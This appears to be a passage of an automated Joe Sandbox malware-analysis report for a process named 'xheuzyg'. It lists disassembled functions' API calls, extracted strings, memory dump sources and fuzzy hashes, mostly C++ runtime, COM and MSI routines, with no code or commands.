                                                                                                                                                                  • Instruction ID: 19d2a05e962ab94e9db8c3f64560b5ad084f131b8742a53baa659c10b523b257
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a2e261776f3ccaafadd9c6fd8b0544dde50905ccf1e7b76666acae41efd7c55
                                                                                                                                                                  • Instruction Fuzzy Hash: 7451E475A00646AEDB30DF9CCDA097FBBF9EB44200B04846EF596D7646E774EA408760
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01634725
                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01634655
                                                                                                                                                                  • ExecuteOptions, xrefs: 016346A0
                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01634742
                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01634787
                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016346FC
                                                                                                                                                                  • Execute=1, xrefs: 01634713
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                  • Opcode ID: d5ecd3dc4006e7e21c25979e3c83f5154842389004b4547a61cc52c68d42f263
                                                                                                                                                                  • Instruction ID: 0c28b1e9f68216f4f4e55f2fe2613e0e1fa2e074d41d7a6c8e1ec3ee5847201e
                                                                                                                                                                  • Opcode Fuzzy Hash: d5ecd3dc4006e7e21c25979e3c83f5154842389004b4547a61cc52c68d42f263
                                                                                                                                                                  • Instruction Fuzzy Hash: E051F73164021AAAEF21ABA8DC95FAE77B9FF5C304F0400ADD705AF1D1EB709A458F54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 001A1AB4
                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1B03
                                                                                                                                                                  • CoCreateInstance.OLE32(001CA2E0,00000000,00000017,001CA2D0,?), ref: 001A1B1C
                                                                                                                                                                  • #8.MSI(?), ref: 001A1B27
                                                                                                                                                                  • #2.OLEAUT32(00000000,?,?), ref: 001A1B62
                                                                                                                                                                  • #8.MSI(?), ref: 001A1B9A
                                                                                                                                                                  • #2.OLEAUT32(00000000,?,?), ref: 001A1BD5
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 001A1C20
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 001A1C4B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInitializeInstanceIos_base_dtorSleepUninitializestd::ios_base::_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3204609414-0
                                                                                                                                                                  • Opcode ID: 669ed720f99a6ac319ed7382651b719b88ade67629386f05f6c4cc7dd3f42ddd
                                                                                                                                                                  • Instruction ID: f184d25663381d68ad48b11e1fb41a3230ba730dc155ca10a042dfd5d94488b7
                                                                                                                                                                  • Opcode Fuzzy Hash: 669ed720f99a6ac319ed7382651b719b88ade67629386f05f6c4cc7dd3f42ddd
                                                                                                                                                                  • Instruction Fuzzy Hash: B0514C71204305AFD714EF64D885E6BB7B9FF8A704F400A5CF5468B291DB71E849CBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 127012223-0
                                                                                                                                                                  • Opcode ID: 790e8278454c874c6e1b7b818521280bd0321a3f7d6b48735a15d4f0365b0218
                                                                                                                                                                  • Instruction ID: ad2ffe81e2f9d95336686e06931725e71fbc79929b7499f8ce494d730019cf44
                                                                                                                                                                  • Opcode Fuzzy Hash: 790e8278454c874c6e1b7b818521280bd0321a3f7d6b48735a15d4f0365b0218
                                                                                                                                                                  • Instruction Fuzzy Hash: A971D5B2900205AFDF259EA48CC2FFE77A99FA9714F29005EE805A7281DF35DC4187A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 001A1970
                                                                                                                                                                  • CoCreateInstance.OLE32(001CA2E0,00000000,00000017,001CA2D0,?), ref: 001A1988
                                                                                                                                                                  • #8.MSI(?), ref: 001A1992
                                                                                                                                                                  • #2.OLEAUT32(00000000,?,?), ref: 001A19CB
                                                                                                                                                                  • #8.MSI(?), ref: 001A19FD
                                                                                                                                                                  • #2.OLEAUT32(00000000,?,?), ref: 001A1A36
                                                                                                                                                                  • CoUninitialize.OLE32(?,?,?), ref: 001A1A90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 948891078-0
                                                                                                                                                                  • Opcode ID: b37a03a8125266cc9358b9b714ea8d2c2db3fb5994094a8382a307e4523fb425
                                                                                                                                                                  • Instruction ID: be2216e1e28a6b830731a4fe1d631fd6daf75731b25f79ca04a5eaf67196f2e3
                                                                                                                                                                  • Opcode Fuzzy Hash: b37a03a8125266cc9358b9b714ea8d2c2db3fb5994094a8382a307e4523fb425
                                                                                                                                                                  • Instruction Fuzzy Hash: C341A171A10218EFCF04DFA4D889EAEB7B9FF49304F400558F502AB291CB71A945CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001AE4D9: __EH_prolog.LIBCMT ref: 001AE4DE
                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1FBD
                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1FEB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_$H_prolog
                                                                                                                                                                  • String ID: </v>$<c r="A1">$<v>$Modified Value
                                                                                                                                                                  • API String ID: 997254673-4044373161
                                                                                                                                                                  • Opcode ID: ea864a15c742e1b69ba63a52fc8888e8fe0bef427e99f0366f3f0d8fc9342e53
                                                                                                                                                                  • Instruction ID: fec37011940da06f0428c5bbc8cafd88763dad5c141426fb38f21cf82540378a
                                                                                                                                                                  • Opcode Fuzzy Hash: ea864a15c742e1b69ba63a52fc8888e8fe0bef427e99f0366f3f0d8fc9342e53
                                                                                                                                                                  • Instruction Fuzzy Hash: CD41C9765083416EC324E734DC86FAFB7E8AF96350F00492CF58A97191EB309D09C792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,?,?,?,?,?,?,001D81BC,19930522,00000000,1FFFFFFF), ref: 001B2715
                                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 001B2748
                                                                                                                                                                  • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 001B2771
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallCheckEncodePointerRangeTranslatorTrys
                                                                                                                                                                  • String ID: MOC$RCC$$
                                                                                                                                                                  • API String ID: 877623402-3012946005
                                                                                                                                                                  • Opcode ID: 949fa102d6a7b4d938dadf452ca71da23812b5c9fad8425ae9dabb40fadd47c4
                                                                                                                                                                  • Instruction ID: 09494e80c6b68a5067d3dda98230aabd110c5fc975896249ecbd69ad5805b711
                                                                                                                                                                  • Opcode Fuzzy Hash: 949fa102d6a7b4d938dadf452ca71da23812b5c9fad8425ae9dabb40fadd47c4
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C41B932500249AFDF11CF44C885EEEB7AAEF68314F288588FE0467251CB34ED95CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,001BCCAB,?,?,00000000), ref: 001BCC5D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                  • Opcode ID: 52a8c07adecc82b62b68129d2385687b26cd17e8ecd339a0cde02f9c064b2de7
                                                                                                                                                                  • Instruction ID: db2ad771684fdcb292aaa67875e12770682da75cbc3d3b4da5605eed9bf873be
                                                                                                                                                                  • Opcode Fuzzy Hash: 52a8c07adecc82b62b68129d2385687b26cd17e8ecd339a0cde02f9c064b2de7
                                                                                                                                                                  • Instruction Fuzzy Hash: 00210A32A01214ABC7229B24DD81E9A7F68EF757A4F250125F95EA72D0D730ED01C6E1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                  • Instruction ID: c6c262939aa08963ea6222e8b123c256eb86babbdfc474b048a926d7a241c1af
                                                                                                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                  • Instruction Fuzzy Hash: AB021771508342AFDB09CF18C990A6FBBEAEFC8704F04892DF9955B264DB31E905CB56
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c8c444a3d583a57202a54c526f8994900f9547a190c59887f7f5fccc61585539
                                                                                                                                                                  • Instruction ID: f78acefc83a9afe0d9b1eb50952129b24de8b835c2eb3f4849f9e1c3e26ea2d3
                                                                                                                                                                  • Opcode Fuzzy Hash: c8c444a3d583a57202a54c526f8994900f9547a190c59887f7f5fccc61585539
                                                                                                                                                                  • Instruction Fuzzy Hash: FAB11474A04249EFDB15DFA8C881FAEBBB6BF69304F14415CF501A7292C774E981CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,001B4BF0,001B179B), ref: 001B4C07
                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B4C15
                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B4C2E
                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,001B4BF0,001B179B), ref: 001B4C80
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                  • Opcode ID: d933c06ca8addbb235059b6ed8b67adc2794404fde46a8f3ec0cd9869c723cbc
                                                                                                                                                                  • Instruction ID: ba16a55b82a9a2abf0a1508212e04ff7c75344c52f7489c720e5b6d35322bcb3
                                                                                                                                                                  • Opcode Fuzzy Hash: d933c06ca8addbb235059b6ed8b67adc2794404fde46a8f3ec0cd9869c723cbc
                                                                                                                                                                  • Instruction Fuzzy Hash: A801DF3220B7155FA725ABB4BCD9AE73F54EF21BB8760833AF524415E2EF214C819181
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001AE1A6
                                                                                                                                                                  • int.LIBCPMT ref: 001AE1B9
                                                                                                                                                                    • Part of subcall function 001A1385: std::_Lockit::_Lockit.LIBCPMT ref: 001A1396
                                                                                                                                                                    • Part of subcall function 001A1385: std::_Lockit::~_Lockit.LIBCPMT ref: 001A13B0
                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 001AE1C2
                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 001AE1F9
                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 001AE202
                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001AE22A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                  • Opcode ID: 7144f08d152b9b56cee08389076698ff1f1d36519c41bbe7e5e1342f9d17be28
                                                                                                                                                                  • Instruction ID: 4a8f0e804a7bacdcfb993114f686648b2a1c69d1ba6121702cb4060c7a90c237
                                                                                                                                                                  • Opcode Fuzzy Hash: 7144f08d152b9b56cee08389076698ff1f1d36519c41bbe7e5e1342f9d17be28
                                                                                                                                                                  • Instruction Fuzzy Hash: CD11C43A90012CABCF04EFD4D9459EE7BF9AF65724F11015AE905A7291DF709E05CBD0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001ADEBB
                                                                                                                                                                  • int.LIBCPMT ref: 001ADECE
                                                                                                                                                                    • Part of subcall function 001A1385: std::_Lockit::_Lockit.LIBCPMT ref: 001A1396
                                                                                                                                                                    • Part of subcall function 001A1385: std::_Lockit::~_Lockit.LIBCPMT ref: 001A13B0
                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 001ADED7
                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 001ADF0E
                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 001ADF17
                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001ADF3F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                  • Opcode ID: ba717c2975f2b6350b19acad1dc2333e75dbe73a45509afaf958305c57a403ae
                                                                                                                                                                  • Instruction ID: 3bef55255a0badb284da0e689091e42786a6a05b5f2b8ad861d6c4ab2ee67679
                                                                                                                                                                  • Opcode Fuzzy Hash: ba717c2975f2b6350b19acad1dc2333e75dbe73a45509afaf958305c57a403ae
                                                                                                                                                                  • Instruction Fuzzy Hash: 5311043A900518ABCF04EFE8D8059AEB7B8AF66724F11415AF906A7291DF709E05CBD0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                  • Instruction ID: 6238aad269eba90c1cb2ea1ebc0299c7e00ed9105bb6676cf9af84b8aee99c51
                                                                                                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                  • Instruction Fuzzy Hash: BC81AE38A152598EEF2F8E6CCC517BFBBA2AF45320F18C559D861A73D1C73089418B55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                  • Opcode ID: fb7bfcc4c6ae657c0a3e6e2b15a811b81a9d46256b8e88ee94aee16904685355
                                                                                                                                                                  • Instruction ID: a9de2c19414bd0c506a04d123ee830f9fe9e1b0812ac3aa9d529e8f549028ebc
                                                                                                                                                                  • Opcode Fuzzy Hash: fb7bfcc4c6ae657c0a3e6e2b15a811b81a9d46256b8e88ee94aee16904685355
                                                                                                                                                                  • Instruction Fuzzy Hash: 4321927AE00159ABDB11DF79DC50AEEBBF9FF54641F08011EEA45E3240EB30DA118BA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001A18D1
                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 001A18E0
                                                                                                                                                                    • Part of subcall function 001A16A2: __Init_thread_footer.LIBCMT ref: 001A1703
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Exception@8Init_thread_footerThrowstd::system_error::system_error
                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 1054456820-1866435925
